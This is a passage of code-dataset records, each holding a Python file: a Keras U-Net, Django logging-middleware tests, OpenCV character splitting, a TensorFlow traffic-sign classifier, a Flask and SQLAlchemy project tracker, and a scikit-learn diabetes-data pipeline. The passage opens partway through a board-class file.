self.board[x][y] = color\r\n\r\n\r\n def __repr__(self):\r\n s = \"Board({}x{}):\\n{}\".format(self.width, self.height,\r\n \"\\n\".join(\r\n \", \".join(\r\n str(color) for color in line)\r\n for line in self.board\r\n ))\r\n return s\r\n\r\n\r\nif __name__ == '__main__':\r\n import jsonpickle\r\n\r\n # create a board\r\n board = Board(3, 3)\r\n\r\n # pickle and depickle\r\n json = jsonpickle.encode(board)\r\n copy = jsonpickle.decode(json)\r\n assert copy.width == board.width\r\n assert copy.board[0][0] == board.board[0][0]\r\n\r\n # Set some pixels, also outside\r\n board.set(0, 0, colors[\"green\"])\r\n board.set(2, 2, colors[\"green\"])\r\n board.set(6, 6, colors[\"green\"])\r\n print(board)\r\n\r\n # Reset the board\r\n board.reset()\r\n print(board)\r\n\r\n","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"32193247","text":"from keras.models import Model\nfrom keras.layers import Input, Conv2D, Dropout, MaxPooling2D, UpSampling2D, concatenate\n\n\ndef U_net(pretrained_weights=None, input_size=(256, 256, 1), n_output_channels=1,\n channels_start=4, dropout=0.0, head_dropout=0.3, depth=5, pool_size=2,\n final_activation='sigmoid'):\n \"\"\"\n model = U_net(\n input_size=(None, None, 3), n_output_channels=1,\n channels_start=8, dropout=0.0, head_dropout=0.4,\n depth=5, pool_size=2, final_activation='sigmoid'\\\n )\n \"\"\"\n assert channels_start > n_output_channels * 2\n assert final_activation in ['sigmoid', 'softmax']\n inputs = Input(input_size)\n\n in_depth_layers = []\n x = inputs\n\n for i in range(depth):\n x = Conv2D(2 ** i * channels_start, 3, activation='relu', padding='same', kernel_initializer='he_normal')(x)\n x = Conv2D(2 ** i * channels_start, 3, activation='relu', padding='same', kernel_initializer='he_normal')(x)\n x = drop = Dropout(dropout)(x)\n x = MaxPooling2D(pool_size=(pool_size, pool_size))(x)\n\n in_depth_layers.append(drop)\n\n x = Conv2D(2 ** depth * channels_start, 3, activation='relu', padding='same', kernel_initializer='he_normal')(x)\n x = Conv2D(2 ** depth * channels_start, 3, activation='relu', padding='same', kernel_initializer='he_normal')(x)\n x = Dropout(dropout)(x)\n\n for i in reversed(range(depth)):\n x = Conv2D(2 ** i * channels_start, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\n UpSampling2D(size=(pool_size, pool_size))(x))\n x = concatenate([in_depth_layers[i], x], axis=3)\n x = Conv2D(2 ** i * channels_start, 3, activation='relu', padding='same', kernel_initializer='he_normal')(x)\n x = Conv2D(2 ** i * channels_start, 3, activation='relu', padding='same', kernel_initializer='he_normal')(x)\n\n x = Conv2D(n_output_channels * 2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(x)\n x = Dropout(head_dropout)(x)\n x = Conv2D(n_output_channels * 2, 1, activation='relu')(x)\n x = Dropout(head_dropout)(x)\n x = Conv2D(n_output_channels, 1, activation=final_activation)(x)\n\n model = Model(input=inputs, output=x)\n\n if pretrained_weights is not None:\n model.load_weights(pretrained_weights)\n\n return model\n","sub_path":"enjoyml/keras/applications.py","file_name":"applications.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"53658440","text":"#! /usr/bin/env python\nimport io\nimport unittest\n\nimport logging\nimport mock\nfrom django.conf import settings\nfrom django.test import RequestFactory, override_settings\n\nimport request_logging\nfrom request_logging.middleware import LoggingMiddleware, DEFAULT_LOG_LEVEL, DEFAULT_COLORIZE, DEFAULT_MAX_BODY_LENGTH\n\nsettings.configure()\n\n\nclass BaseLogTestCase(unittest.TestCase):\n def _assert_logged(self, mock_log, expected_entry):\n calls = mock_log.log.call_args_list\n text = \"\".join([call[0][1] for call in calls])\n self.assertIn( expected_entry, text )\n\n def _assert_logged_with_level(self, mock_log, level):\n calls = mock_log.log.call_args_list\n called_levels = set(call[0][0] for call in calls)\n self.assertIn(level, called_levels, \"{} not in {}\".format(level, called_levels))\n\n def _assert_not_logged(self, mock_log, unexpected_entry):\n calls = mock_log.log.call_args_list\n text = \" \".join([call[0][1] for call in calls])\n self.assertNotIn(unexpected_entry, text)\n\n\n@mock.patch.object(request_logging.middleware, \"request_logger\")\nclass LogTestCase(BaseLogTestCase):\n def setUp(self):\n self.factory = RequestFactory()\n self.middleware = LoggingMiddleware()\n\n def test_request_body_logged(self, mock_log):\n body = u\"some body\"\n request = self.factory.post(\"/somewhere\", data={\"file\": body})\n self.middleware.process_request(request)\n self._assert_logged(mock_log, body)\n\n def test_request_binary_logged(self, mock_log):\n body = u\"some body\"\n datafile = io.StringIO(body)\n request = self.factory.post(\"/somewhere\", data={\"file\": datafile})\n self.middleware.process_request(request)\n self._assert_logged(mock_log, \"(binary data)\")\n\n def test_request_headers_logged(self, mock_log):\n request = self.factory.post(\"/somewhere\",\n **{'HTTP_USER_AGENT': 'silly-human'})\n self.middleware.process_request(request)\n self._assert_logged(mock_log, \"HTTP_USER_AGENT\")\n\n def test_response_headers_logged(self, mock_log):\n request = self.factory.post(\"/somewhere\")\n response = mock.MagicMock()\n response.get.return_value = 'application/json'\n response._headers = {'test_headers': 'test_headers'}\n self.middleware.process_response(request, response)\n self._assert_logged(mock_log, \"test_headers\")\n\n\nclass BaseLogSettingsTestCase(BaseLogTestCase):\n def setUp(self):\n body = u\"some body\"\n datafile = io.StringIO(body)\n self.request = RequestFactory().post(\n \"/somewhere\",\n data={'file': datafile},\n **{'HTTP_USER_AGENT': 'silly-human'}\n )\n\n\n@mock.patch.object(request_logging.middleware, \"request_logger\")\nclass LogSettingsLogLevelTestCase(BaseLogSettingsTestCase):\n def test_logging_default_debug_level(self, mock_log):\n middleware = LoggingMiddleware()\n middleware.process_request(self.request)\n self._assert_logged_with_level(mock_log, DEFAULT_LOG_LEVEL)\n\n @override_settings(REQUEST_LOGGING_DATA_LOG_LEVEL=logging.INFO)\n def test_logging_with_customized_log_level(self, mock_log):\n middleware = LoggingMiddleware()\n middleware.process_request(self.request)\n self._assert_logged_with_level(mock_log, logging.INFO)\n\n @override_settings(REQUEST_LOGGING_DATA_LOG_LEVEL=None)\n def test_invalid_log_level(self, mock_log):\n with self.assertRaises(ValueError):\n LoggingMiddleware()\n\n\n@mock.patch.object(request_logging.middleware, \"request_logger\")\nclass LogSettingsColorizeTestCase(BaseLogSettingsTestCase):\n def test_default_colorize(self, mock_log):\n middleware = LoggingMiddleware()\n middleware.process_request(self.request)\n self.assertEqual(DEFAULT_COLORIZE, self._is_log_colorized(mock_log))\n\n @override_settings(REQUEST_LOGGING_DISABLE_COLORIZE=False)\n def test_disable_colorize(self, mock_log):\n middleware = LoggingMiddleware()\n middleware.process_request(self.request)\n self.assertFalse(self._is_log_colorized(mock_log))\n\n @override_settings(REQUEST_LOGGING_DISABLE_COLORIZE='Not a boolean')\n def test_invalid_colorize(self, mock_log):\n with self.assertRaises(ValueError):\n LoggingMiddleware()\n\n @override_settings(REQUEST_LOGGING_DISABLE_COLORIZE=False)\n def test_disable_colorize(self, mock_log):\n middleware = LoggingMiddleware()\n middleware.process_request(self.request)\n self.assertFalse(self._is_log_colorized(mock_log))\n\n def _is_log_colorized(self, mock_log):\n reset_code = '\\x1b[0m'\n calls = mock_log.log.call_args_list\n logs = \" \".join(call[0][1] for call in calls)\n return reset_code in logs\n\n\n@mock.patch.object(request_logging.middleware, \"request_logger\")\nclass LogSettingsMaxLengthTestCase(BaseLogTestCase):\n @override_settings(REQUEST_LOGGING_DISABLE_COLORIZE=False)\n def test_default_max_body_length(self, mock_log):\n factory = RequestFactory()\n middleware = LoggingMiddleware()\n\n body = DEFAULT_MAX_BODY_LENGTH * \"0\" + \"1\"\n request = factory.post(\"/somewhere\", data={\"file\": body})\n middleware.process_request(request)\n self._assert_logged(mock_log, str(request.body[:DEFAULT_MAX_BODY_LENGTH]))\n self._assert_not_logged(mock_log, body)\n\n @override_settings(REQUEST_LOGGING_MAX_BODY_LENGTH=150, REQUEST_LOGGING_DISABLE_COLORIZE=False)\n def test_customized_max_body_length(self, mock_log):\n factory = RequestFactory()\n middleware = LoggingMiddleware()\n\n body = 150 * \"0\" + \"1\"\n request = factory.post(\"/somewhere\", data={\"file\": body})\n middleware.process_request(request)\n self._assert_logged(mock_log, str(request.body[:150]))\n self._assert_not_logged(mock_log, body)\n\n @override_settings(REQUEST_LOGGING_MAX_BODY_LENGTH='Not an int')\n def test_invalid_max_body_length(self, mock_log):\n with self.assertRaises(ValueError):\n LoggingMiddleware()\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"347799950","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n# helper function for sorting sub images by X value\ndef sort_list(list1, list2):\n zipped_pairs = zip(list2, list1)\n z = [x for _, x in sorted(zipped_pairs)]\n\n return z\n\n\n\"\"\"\ninput: path to image file\noutput: a unique image for each character detected in an image\n\"\"\"\ndef get_split_images(image):\n im = cv2.imdecode(np.fromstring(image,dtype=np.uint8),cv2.IMREAD_COLOR)\n\n imgray = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY) # convert to greyscale\n\n # detect contours\n ret,thresh = cv2.threshold(imgray,127,255,0)\n im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n output_contours = []\n output_hierarchy = []\n output_xs = []\n\n # for each contour found\n for i, contour in enumerate(contours):\n\n # get rectangle bounding contour\n [x,y,w,h] = cv2.boundingRect(contour)\n\n # discard areas that are too large\n if h > 300 and w > 300:\n continue\n\n # discard areas that are too small\n if h < 40 or w < 40:\n continue\n\n roi = im[y:y + h, x:x + w]\n\n # store the character's image, its hierarchy, and its X value\n output_contours.append(roi)\n output_hierarchy.append(hierarchy[0,i,3])\n output_xs.append(x)\n\n\n # sort contours by X values\n output_contours = sort_list(output_contours, output_xs)\n output_hierarchy = sort_list(output_hierarchy, output_xs)\n\n # find the top level contour\n min_hierarchy = min(output_hierarchy)\n\n result = []\n # output contours that are on the top level\n print(len(output_contours))\n for i in range(len(output_contours)):\n b, g, r = cv2.split(output_contours[i])\n a = np.ones(b.shape, dtype=b.dtype) * 50\n\n final_img = cv2.merge((b, g, r))\n\n final_img = cv2.normalize(final_img, None, alpha = 0, beta = 1, norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)\n\n final_img = cv2.resize(final_img,(50,50))\n\n final_img = cv2.cvtColor(final_img,cv2.COLOR_BGR2GRAY)\n\n result.append(final_img)\n #result.append(np.expand_dims(np.expand_dims(final_img,axis=-1),axis=0))\n\n return result\n","sub_path":"Lab6/server/split_up_text.py","file_name":"split_up_text.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"600549576","text":"import pickle\nimport numpy as np\n\nimport tensorflow as tf\nfrom tensorflow.contrib.layers import flatten\n\n\ndef safe_indexing(X, indices):\n \"\"\"Return items or rows from X using indices.\n Allows simple indexing of lists or arrays.\n Parameters\n ----------\n X : array-like, sparse-matrix, list.\n Data from which to sample rows or items.\n indices : array-like, list\n Indices according to which X will be subsampled.\n \"\"\"\n if hasattr(X, \"iloc\"):\n # Pandas Dataframes and Series\n return X.iloc[indices]\n elif hasattr(X, \"shape\"):\n if hasattr(X, 'take') and (hasattr(indices, 'dtype') and\n indices.dtype.kind == 'i'):\n # This is often substantially faster than X[indices]\n return X.take(indices, axis=0)\n else:\n return X[indices]\n else:\n return [X[idx] for idx in indices]\n\n\ndef shuffle(*arrays):\n random_state = np.random.mtrand._rand\n replace = False\n max_n_samples = None\n\n if len(arrays) == 0:\n return None\n\n first = arrays[0]\n n_samples = first.shape[0] if hasattr(first, 'shape') else len(first)\n\n if max_n_samples is None:\n max_n_samples = n_samples\n elif (max_n_samples > n_samples) and (not replace):\n raise ValueError(\"Cannot sample %d out of arrays with dim %d\"\n \"when replace is False\" % (max_n_samples,\n n_samples))\n\n if replace:\n indices = random_state.randint(0, n_samples, size=(max_n_samples,))\n else:\n indices = np.arange(n_samples)\n random_state.shuffle(indices)\n indices = indices[:max_n_samples]\n\n # convert sparse matrices to CSR for row-based indexing\n # arrays = [a.tocsr() for a in arrays]\n resampled_arrays = [safe_indexing(a, indices) for a in arrays]\n if len(resampled_arrays) == 1:\n # syntactic sugar for the unit argument case\n return resampled_arrays[0]\n else:\n return resampled_arrays\n\n\ndef LeNet(x, dropout_prob):\n # Arguments used for tf.truncated_normal, randomly defines variables for the weights and biases for each layer\n mu = 0\n sigma = 0.1\n\n conv0_W = tf.Variable(tf.truncated_normal(shape=(1, 1, 1, 1), mean=mu, stddev=sigma))\n conv0_b = tf.Variable(tf.zeros(1))\n conv0 = tf.nn.conv2d(x, conv0_W, strides=[1, 1, 1, 1], padding='SAME') + conv0_b\n conv0 = tf.nn.relu(conv0)\n\n # SOLUTION: Layer 1: Convolutional. Input = 32x32x1. Output = 28x28x6.\n conv1_W = tf.Variable(tf.truncated_normal(shape=(5, 5, 1, 6), mean=mu, stddev=sigma))\n conv1_b = tf.Variable(tf.zeros(6))\n conv1 = tf.nn.conv2d(conv0, conv1_W, strides=[1, 1, 1, 1], padding='VALID') + conv1_b\n\n # SOLUTION: Activation.\n conv1 = tf.nn.relu(conv1)\n\n # SOLUTION: Pooling. Input = 28x28x6. Output = 14x14x6.\n conv1 = tf.nn.max_pool(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n # SOLUTION: Layer 2: Convolutional. Output = 10x10x16.\n conv2_W = tf.Variable(tf.truncated_normal(shape=(5, 5, 6, 16), mean=mu, stddev=sigma))\n conv2_b = tf.Variable(tf.zeros(16))\n conv2 = tf.nn.conv2d(conv1, conv2_W, strides=[1, 1, 1, 1], padding='VALID') + conv2_b\n\n # SOLUTION: Activation.\n conv2 = tf.nn.relu(conv2)\n\n # SOLUTION: Pooling. Input = 10x10x16. Output = 5x5x16.\n conv2 = tf.nn.max_pool(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n # SOLUTION: Flatten. Input = 5x5x16. Output = 400.\n fc0 = flatten(conv2)\n\n # SOLUTION: Layer 3: Fully Connected. Input = 400. Output = 120.\n fc1_W = tf.Variable(tf.truncated_normal(shape=(400, 120), mean=mu, stddev=sigma))\n fc1_b = tf.Variable(tf.zeros(120))\n fc1 = tf.matmul(fc0, fc1_W) + fc1_b\n\n # SOLUTION: Activation.\n fc1 = tf.nn.relu(fc1)\n fc1 = tf.nn.dropout(fc1, dropout_prob)\n\n # SOLUTION: Layer 4: Fully Connected. Input = 120. Output = 84.\n fc2_W = tf.Variable(tf.truncated_normal(shape=(120, 84), mean=mu, stddev=sigma))\n fc2_b = tf.Variable(tf.zeros(84))\n fc2 = tf.matmul(fc1, fc2_W) + fc2_b\n\n # SOLUTION: Activation.\n fc2 = tf.nn.relu(fc2)\n fc2 = tf.nn.dropout(fc2, dropout_prob)\n\n # SOLUTION: Layer 5: Fully Connected. Input = 84. Output = 10.\n fc3_W = tf.Variable(tf.truncated_normal(shape=(84, n_classes), mean=mu, stddev=sigma))\n fc3_b = tf.Variable(tf.zeros(n_classes))\n logits = tf.matmul(fc2, fc3_W) + fc3_b\n\n return logits\n\n\ntraining_file = 'train.p'\nvalidation_file = 'valid.p'\ntesting_file = 'test.p'\n\nwith open(training_file, mode='rb') as f:\n train = pickle.load(f)\nwith open(validation_file, mode='rb') as f:\n valid = pickle.load(f)\nwith open(testing_file, mode='rb') as f:\n test = pickle.load(f)\n\nn_train = len(train[\"features\"])\nn_test = len(test[\"features\"])\nn_valid = len(valid[\"features\"])\nn_classes = len(set(test[\"labels\"]))\n\nprint(n_train)\nprint(n_valid)\nprint(n_test)\nprint(n_classes)\n\nwidth, height = len(test[\"features\"][0]), len(test[\"features\"][0][0])\nimage_shape = (width, height)\n\nEPOCHS = 20\nBATCH_SIZE = 256\nLEARNING_RATE = 0.001\nDROPOUT = 0.60\n\nfeatures_placeholder = tf.placeholder(tf.float32, (None, height, width, None), name='features_placeholder')\nfeatures = tf.image.rgb_to_grayscale(features_placeholder)\n\n# why int32? maybe because they are unscaled logits, pixel values are int32\nlogits_placeholder = tf.placeholder(tf.int32, (None), name='logits_placeholder')\none_hot = tf.one_hot(logits_placeholder, n_classes)\ndropout_prob = tf.placeholder(tf.float32)\n# logits = LeNet(features_placeholder)\nlogits = LeNet(features, dropout_prob=dropout_prob)\n\ncorrect_prediction = tf.equal(tf.argmax(logits, 1), tf.argmax(one_hot, 1))\naccuracy_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nsaver = tf.train.Saver()\n\ncross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=one_hot)\nloss_operation = tf.reduce_mean(cross_entropy)\noptimizer = tf.train.AdamOptimizer(learning_rate=LEARNING_RATE)\ntraining_operation = optimizer.minimize(loss_operation)\n\n\ndef evaluate(X_data, y_data):\n num_examples = len(X_data)\n total_accuracy = 0\n sess = tf.get_default_session()\n for offset in range(0, num_examples, BATCH_SIZE):\n batch_x, batch_y = X_data[offset:offset + BATCH_SIZE], y_data[offset:offset + BATCH_SIZE]\n accuracy = sess.run(accuracy_operation,\n feed_dict={features_placeholder: batch_x, logits_placeholder: batch_y, dropout_prob: 1.0})\n total_accuracy += (accuracy * len(batch_x))\n return total_accuracy / num_examples\n\n\n# ## Train the Model\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n # num_examples = tra\n\n print(\"Training...\")\n print()\n for i in range(EPOCHS):\n # TODO Shuffle?\n X_train, y_train = shuffle(train[\"features\"], train[\"labels\"])\n for offset in range(0, n_train, BATCH_SIZE):\n end = offset + BATCH_SIZE\n batch_x, batch_y = X_train[offset:end], y_train[offset:end]\n sess.run(training_operation,\n feed_dict={features_placeholder: batch_x, logits_placeholder: batch_y, dropout_prob: DROPOUT})\n\n # TODO are the labels formatted correctly?\n validation_accuracy = evaluate(valid[\"features\"], valid[\"labels\"])\n print(\"EPOCH {} ...\".format(i + 1))\n print(\"Validation Accuracy = {:.3f}\".format(validation_accuracy))\n print()\n\n saver.save(sess, './lenet')\n print(\"Model saved\")\n\nwith tf.Session() as sess:\n saver.restore(sess, tf.train.latest_checkpoint('.'))\n\n test_accuracy = evaluate(test[\"features\"], test[\"labels\"])\n print(\"Test Accuracy = {:.3f}\".format(test_accuracy))\n","sub_path":"Traffic_Sign_Classifier.py","file_name":"Traffic_Sign_Classifier.py","file_ext":"py","file_size_in_byte":7744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"319298329","text":"import datetime\nimport sqlite3\n\nfrom flask import Flask, render_template, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\n\nimport module.func\n\n\n# slite3 database stuff\nSQLITE_DATABASE = 'temp_db.db'\nconn = sqlite3.connect(SQLITE_DATABASE)\nconn.close()\n\n# flask app\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///temp_db.db'\n\n#flask-sqlalchemy\ndb = SQLAlchemy(app)\n\n# models\n\n# TODO:\n## commit types\n## reference, comment, deliverable\n\n\nclass Client(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n\n projects = db.relationship('Project',\n backref=db.backref('Clients', lazy=True))\n\n def __repr__(self):\n return '<Client %r>' % self.id\n\n\nclass Project(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String)\n expired = db.Column(db.Boolean, default=False)\n\n client_id = db.Column(db.Integer, db.ForeignKey('client.id'),\n nullable=False)\n\n commits = db.relationship('Commit',\n backref=db.backref('Project', lazy=True))\n\n\n def __repr__(self):\n return '<Project %r>' % self.id\n\n\nclass User(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(80), nullable=False)\n picture = db.Column(db.String, default='default_user.jpg')\n\n commits = db.relationship('Commit',\n backref=db.backref('User', lazy=True))\n\n # lead:[PROJECT:ID]\n\n def __repr__(self):\n return '<User %r>' % self.id\n\n\nclass Commit(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n working_files = db.Column(db.String)\n deliverable = db.Column(db.String)\n subdate = db.Column(db.DateTime, default=datetime.datetime.utcnow)\n commit_type = db.Column(db.String)\n commit_round = db.Column(db.Integer, default=1)\n expired = db.Column(db.Boolean, default=False)\n note = db.Column(db.String)\n\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'),\n nullable=False)\n project_id = db.Column(db.Integer, db.ForeignKey('project.id'),\n nullable=False)\n\n def __repr__(self):\n return '<Commit %r>' % self.id\n\n\n# create tables\ndb.create_all()\n\n@app.route('/')\ndef index():\n # module.func.populate_db(db)\n data = {\n 'client': module.func.client_get(1),\n 'clients': module.func.client_all(),\n 'user': module.func.user_get(1),\n 'users': module.func.user_all(),\n 'project': module.func.project_get(1),\n 'projects': module.func.project_all(),\n 'commit': module.func.commit_get(1),\n 'commits': module.func.commit_all()\n }\n\n return render_template('index.html', data=data)\n\n\n@app.route('/client')\ndef clients():\n data = module.func.client_all()\n\n return render_template('clients.html', data=data)\n\n\n@app.route('/project')\ndef projects():\n data = module.func.project_all()\n\n return render_template('projects.html', data=data)\n\n\n@app.route('/user')\ndef users():\n data = module.func.user_all()\n\n return render_template('users.html', data=data)\n\n\n@app.route('/commit')\ndef commits():\n data = module.func.commit_all()\n\n return render_template('commits.html', data=data)\n\n\n@app.route('/client/<int:id>')\ndef client(id):\n data = module.func.client_get(id)\n\n # relational data\n # projects\n projects = []\n for project in data[0]['projects']:\n raw_project = Project.query.filter_by(id=project.id).first()\n projects.append(module.func.scheme_project(raw_project))\n\n data[0]['projects'] = projects\n\n\n return render_template('client.html', data=data)\n\n\n@app.route('/project/<int:id>')\ndef project(id):\n # get base project data\n data = module.func.project_get(id)\n\n # append relational\n # commits\n commits = []\n user_ids = []\n users = []\n for commit in data[0]['commits']:\n raw_commit = Commit.query.filter_by(id=commit.id).first()\n commits.append(module.func.scheme_commit(raw_commit))\n\n data[0]['commits'] = commits\n\n # user (only works if commits have been processed)\n for user in data[0]['commits']:\n if user['user_id'] not in user_ids:\n user_ids.append(user['user_id'])\n \n raw_user = User.query.filter_by(id=user['user_id']).first()\n if raw_user != None:\n users.append(module.func.scheme_user(raw_user))\n\n data[0]['users'] = users\n\n # commit\n # add replace commit:user_id with scheme_user()\n for commit in data[0]['commits']:\n if commit['user_id'] in user_ids:\n for user in data[0]['users']:\n if user['id'] == commit['user_id']:\n commit['user_id'] = {'id': user['id'], 'name': user['name']}\n\n # client\n client = {}\n raw_client = Client.query.filter_by(id=data[0]['client_id']).first()\n if raw_client:\n data[0]['client_id'] = module.func.scheme_client(raw_client)\n\n\n return render_template('project.html', data=data)\n\n\n@app.route('/user/<int:id>')\ndef user(id):\n # user data\n data = module.func.user_get(id)\n\n # append relational\n # commits\n commits = []\n project_ids = []\n projects = []\n for commit in data[0]['commits']:\n raw_commit = Commit.query.filter_by(id=commit.id).first()\n commits.append(module.func.scheme_commit(raw_commit))\n\n data[0]['commits'] = commits\n\n # projects (only works if commits have been processed)\n for commit in data[0]['commits']:\n if commit['project_id'] not in project_ids:\n project_ids.append(commit['project_id'])\n raw_project = Project.query.filter_by(id=commit['project_id']).first()\n if raw_project != None:\n projects.append(module.func.scheme_project(raw_project))\n\n data[0]['projects'] = projects\n\n\n return render_template('user.html', data=data)\n\n\n@app.route('/commit/<int:id>')\ndef commit(id):\n data = module.func.commit_get(id)\n\n # append relational\n # user\n user = {}\n raw_user = User.query.filter_by(id=data[0]['user_id']).first()\n if raw_user:\n data[0]['user_id'] = module.func.scheme_user(raw_user)\n\n # project\n project = {}\n raw_project = Project.query.filter_by(id=data[0]['project_id']).first()\n if raw_project:\n data[0]['project_id'] = module.func.scheme_project(raw_project)\n\n\n return render_template('commit.html', data=data)\n\n\n\"\"\"\n@app.route('/_get_current_user')\ndef get_current_user():\n return jsonify(username=g.user.username,\n email=g.user.email,\n id=g.user.id)\n\"\"\"\n\nif __name__ == \"__main__\":\n # app = create_app(config.DATABASE_URI, debug=True)\n app.run(debug=True)","sub_path":"project_commit/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"58004090","text":"import os\nimport pandas as pd\nimport numpy as np\n\nimport scipy\nimport math\n\nimport sklearn\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV, StratifiedShuffleSplit, cross_val_score\nfrom sklearn.metrics import accuracy_score\n\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.base import TransformerMixin, BaseEstimator \n\nfrom sklearn.dummy import DummyClassifier\n\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.preprocessing import OrdinalEncoder, OneHotEncoder, StandardScaler\n\nfrom sklearn.linear_model import LogisticRegression, SGDClassifier\nfrom sklearn.naive_bayes import GaussianNB\n\nfrom sklearn.ensemble import VotingClassifier, RandomForestClassifier\nfrom sklearn.svm import SVC\n\nfrom sklearn.ensemble import BaggingClassifier, AdaBoostClassifier, GradientBoostingClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nclass DataFrameSelector(BaseEstimator, TransformerMixin):\n def __init__(self, attribute_names):\n self.attribute_names = attribute_names\n def fit(self, X, y=None):\n return self\n def transform(self, X):\n return X[self.attribute_names].values\n\nnp.random.seed(42)\n\ndiabetic = pd.read_csv('diabetes/diabetic_data_balanced.csv')\n\n# Anonymise\ndiabetic = diabetic.groupby('patient_nbr', group_keys=False) \\\n .apply(lambda df: df.sample(1))\n\n\n# Train test split\nX, y = diabetic.drop('readmitted', axis=1), diabetic['readmitted']\n\nsplit = StratifiedShuffleSplit(n_splits=1, test_size=0.1, random_state=42)\nfor train_index, test_index in split.split(X, y):\n X_train, X_test = X.iloc[train_index], X.iloc[test_index]\n y_train, y_test = y.iloc[train_index], y.iloc[test_index]\n \n\n# PREPROCESSING PIPELINE\ndiabetic_num_to_cat_features = ['admission_type_id', 'discharge_disposition_id','admission_source_id']\n\ndiabetic_cat_to_num_features = ['max_glu_serum', 'A1Cresult']\n\ndiabetic_num_features = ['time_in_hospital', 'num_lab_procedures','num_procedures', 'num_medications', 'number_outpatient', 'number_emergency', 'number_inpatient', 'number_diagnoses']\n\n\n# CHANGE DIABETIC DRUGS TO EITHER FULL AND EMPTY ARRAY\n# FOR FULL AND REDUCED FEATURE SETS\n\n# diabetic_drugs = ['medical_specialty', 'metformin', 'repaglinide', 'nateglinide','chlorpropamide', 'glimepiride', 'acetohexamide', 'glipizide', 'glyburide','tolbutamide', 'pioglitazone', 'rosiglitazone', 'acarbose', 'miglitol','troglitazone', 'tolazamide', 'examide', 'citoglipton', 'insulin', 'glyburide-metformin', 'glipizide-metformin', 'glimepiride-pioglitazone','metformin-rosiglitazone', 'metformin-pioglitazone']\n\ndiabetic_drugs = []\n\ndiabetic_cat_features = ['race', 'gender', 'change', 'diabetesMed']\ndiabetic_diag_features = ['diag_1', 'diag_2', 'diag_3']\n\nnum_pipeline = Pipeline([\n ('selector', DataFrameSelector(diabetic_num_features)),\n ('imputer', SimpleImputer(strategy=\"median\")),\n ('std_scaler', StandardScaler()),\n])\n\nage_pipeline = Pipeline([\n ('selector', DataFrameSelector(['age'])),\n ('ordinal_encoder', OrdinalEncoder(categories=[['[0-10)', '[10-20)', '[20-30)', '[30-40)', '[40-50)', '[50-60)', '[60-70)', '[70-80)', '[80-90)', '[90-100)']])),\n ('std_scaler', StandardScaler()),\n])\n\nclass DiagEncoder(TransformerMixin):\n def __init__(self, *args, **kwargs):\n self.encoder = OneHotEncoder(*args, **kwargs, categories='auto', sparse=False)\n def fit(self, X, y=0):\n X = [[self.get_type(icd_str) for icd_str in x] for x in X]\n self.encoder.fit(X)\n return self\n def transform(self, X, y=0):\n X = [[self.get_type(icd_str) for icd_str in x] for x in X]\n return self.encoder.transform(X)\n def get_type(self, icd_str):\n if isinstance(icd_str, float) and math.isnan(icd_str):\n return('missing')\n elif icd_str.isnumeric():\n icd = int(icd_str)\n elif icd_str[:3].isnumeric():\n icd = int(icd_str[:3])\n else:\n return 'other'\n\n if (icd >= 390 and icd <= 459 or icd == 785):\n return 'circulatory'\n elif (icd >= 520 and icd <= 579 or icd == 787):\n return 'digestive'\n elif (icd >= 580 and icd <= 629 or icd == 788):\n return 'genitourinary'\n elif (icd == 250):\n return 'diabetes'\n elif (icd >= 800 and icd <= 999):\n return 'injury'\n elif (icd >= 710 and icd <= 739):\n return 'musculoskeletal'\n elif (icd >= 140 and icd <= 239):\n return 'neoplasms'\n elif (icd >= 460 and icd <= 519 or icd == 786):\n return 'respiratory'\n else:\n return 'other'\n \n\ndiag_pipeline = Pipeline([\n ('selector', DataFrameSelector(diabetic_diag_features)),\n ('diag_encoder', DiagEncoder()),\n])\n\ncat_pipeline = Pipeline([\n ('selector', DataFrameSelector(diabetic_num_to_cat_features + diabetic_cat_features + diabetic_drugs + diabetic_cat_to_num_features)),\n ('imputer', SimpleImputer(strategy='constant')),\n ('encoder', OneHotEncoder(categories='auto', sparse=False))\n\n])\n\nfull_pipeline = FeatureUnion(transformer_list=[\n (\"num_pipeline\", num_pipeline),\n ('age_pipeline', age_pipeline),\n ('diag_pipeline', diag_pipeline),\n (\"cat_pipeline\", cat_pipeline),\n])\n\nX_train = full_pipeline.fit_transform(X_train)\n\n\n# MACHINE LEARNING ALGORITHMS\nprint(X_train.shape)\n\n\n# 